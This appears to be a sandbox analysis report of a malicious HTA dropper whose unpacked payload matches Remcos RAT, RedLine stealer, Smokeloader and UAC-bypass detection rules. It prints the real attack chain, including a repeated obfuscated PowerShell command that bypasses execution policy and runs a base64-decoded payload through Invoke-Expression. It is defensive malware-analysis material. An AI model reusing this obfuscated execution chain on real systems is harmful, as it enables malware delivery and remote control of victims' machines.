                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007B6411
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007A64BB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079E846
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007A6A32
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007BCC44
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007B2CB0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007BCE73
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 004020E7 appears 41 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 007B4217 appears 46 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 0078234E appears 37 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 007B3B0C appears 41 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 004338A5 appears 41 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: String function: 00433FB0 appears 55 times
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: ecome[1].exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: nicetomeetyousweeet.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/78@0/2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 6_2_00416AB7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00796D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 6_2_00796D1E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, | 6_2_0040E219
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource, | 6_2_0041A63F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 6_2_00419BC4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-GJDISH
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpn0qad1.ngf.ps1
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Software\ | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Rmc-GJDISH | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Exe | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Exe | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Rmc-GJDISH | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: 0DG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Inj | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Inj | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: BG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: BG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: BG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: @CG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: BG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: exepath | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: @CG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: exepath | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: BG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: licence | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: `=G | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: XCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: dCG | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: Administrator | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: User | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: del | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: del | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: del | 6_2_0040D767
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Command line argument: %c} | 6_2_007D6277
                Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: newthingswithgreatupdateiongivenbestthingswithme.hta | ReversingLabs: Detection: 15%
                Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta"
                Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 656
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 712
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 640
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 776
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 784
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 708
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 720
                Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe"
